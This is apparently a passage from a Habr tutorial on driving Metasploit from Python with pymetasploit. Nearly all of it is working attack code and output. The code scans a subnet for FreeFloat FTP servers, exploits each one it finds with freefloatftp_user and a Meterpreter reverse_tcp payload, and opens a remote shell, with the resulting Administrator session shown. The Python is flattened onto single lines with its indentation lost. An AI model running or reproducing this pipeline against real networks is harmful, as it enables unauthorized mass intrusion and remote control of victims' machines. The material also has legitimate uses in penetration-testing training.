git clone https://github.com/allfro/pymetasploit
cd pymetasploit python setup.py install
root@kali-template:~# msfrpcd -h Usage: msfrpcd <options> OPTIONS: -P <opt> Specify the password to access msfrpcd -S Disable SSL on the RPC socket -U <opt> Specify the username to access msfrpcd -a <opt> Bind to this IP address -f Run the daemon in the foreground -h Help banner -n Disable database -p <opt> Bind to this port instead of 55553 -t <opt> Token Timeout (default 300 seconds) -u <opt> URI for Web server root@kali-template:~# msfrpcd -P password -n -f -a 127.0.0.1 [*] MSGRPC starting on 127.0.0.1:55553 (SSL):Msg... [*] MSGRPC ready at 2018-03-28 14:34:10 +0300.
from metasploit.msfrpc import MsfRpcClient from metasploit.msfconsole import MsfRpcConsole
client = MsfRpcClient('password')
console = MsfRpcConsole(client, cb=read_console)
In [6]: console.console.read() Out[6]: {'busy': False, 'data': '', 'prompt': 'msf > '}
global global_positive_out global_positive_out = list() global global_console_status global_console_status = False def read_console(console_data): global global_console_status global_console_status = console_data['busy'] print global_console_status if '[+]' in console_data['data']: sigdata = console_data['data'].rstrip().split('\n') for line in sigdata: if '[+]' in line: global_positive_out.append(line) print console_data['data']
console.execute('use auxiliary/scanner/ftp/ftp_version') console.execute('set RHOSTS 192.168.0.0/24') console.execute('set THREADS 20') console.execute('run') time.sleep(5)
while global_console_status: time.sleep(5)
targets = list() for line in global_positive_out: if 'FreeFloat' in line: ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', line)[0] targets.append(ip)
In [4]: exploit.required Out[4]: ['RHOST', 'SSLVersion', 'ConnectTimeout', 'FTPTimeout', 'RPORT'] In [5]: exploit.options Out[5]: ['FTPDEBUG', 'ContextInformationFile', 'WORKSPACE', 'FTPPASS', 'FTPUSER', 'CHOST', 'RHOST', 'Proxies', 'DisablePayloadHandler', 'TCP::send_delay', 'SSLVersion', 'ConnectTimeout', 'CPORT', 'SSLVerifyMode', 'FTPTimeout', 'VERBOSE', 'SSLCipher', 'SSL', 'WfsDelay', 'TCP::max_send_size', 'EnableContextEncoding', 'RPORT'] exploit = client.modules.use('exploit', 'windows/ftp/freefloatftp_user') pl = client.modules.use('payload', 'windows/meterpreter/reverse_tcp') pl['LPORT'] = 443 pl['LHOST'] = localhost pl['EXITFUNC'] = 'thread'
for target in targets: exploit['RHOST'] = target ftpsession = exploit.execute(payload=pl) time.sleep(5)
{'job_id': 1, 'uuid': 'uv0ontph'}
{1: {'info': 'SEMYON-FE434C23\\Administrator @ SEMYON-FE434C23', 'username': 'root', 'session_port': 21, 'via_payload': 'payload/windows/meterpreter/reverse_tcp', 'uuid': 'azxxoup4', 'tunnel_local': '192.168.0.92:443', 'via_exploit': 'exploit/windows/ftp/freefloatftp_user', 'arch': 'x86', 'exploit_uuid': 'uv0ontph', 'tunnel_peer': '192.168.0.90:4418', 'platform': 'windows', 'workspace': 'false', 'routes': '', 'target_host': '192.168.0.90', 'type': 'meterpreter', 'session_host': '192.168.0.90', 'desc': 'Meterpreter'}}
def get_session(sessions_list, exploit_job): if not sessions_list: return False for session in sessions_list: if sessions_list[session]['exploit_uuid'] == exploit_job['uuid']: return session return False def compare_sessions(old_sessions_list, seconds = 120): flag = False while not flag: if seconds == 0: return False if client.sessions.list != old_sessions_list: flag = True time.sleep(1) seconds -= 1 current_sessions = client.sessions.list all(map(current_sessions.pop, old_sessions_list)) return current_sessions
old_sessions = client.sessions.list ftpsession = exploit.execute(payload=pl) time.sleep(5) ftpsessioncode = get_session(client.sessions.list, ftpsession) if not ftpsessioncode: sys.exit()
shell = client.sessions.session(ftpsessioncode) shell.read()
Source: https://habr.com/ru/post/353642/